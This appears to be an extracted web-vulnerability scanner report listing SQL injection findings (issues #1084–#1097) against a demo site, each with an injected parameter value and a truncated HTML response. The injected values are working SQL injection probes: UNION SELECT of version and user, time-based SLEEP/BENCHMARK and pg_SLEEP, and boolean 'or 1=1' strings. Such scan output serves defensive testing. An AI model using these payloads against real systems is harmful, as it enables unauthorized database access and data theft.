href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1084Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1085\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1086\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1087\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1088\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iopg_SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1089\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or (\"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1090\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1091\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL \nSELECTCHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1092\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1093\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1094\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'*'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1095Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1096\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1097\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 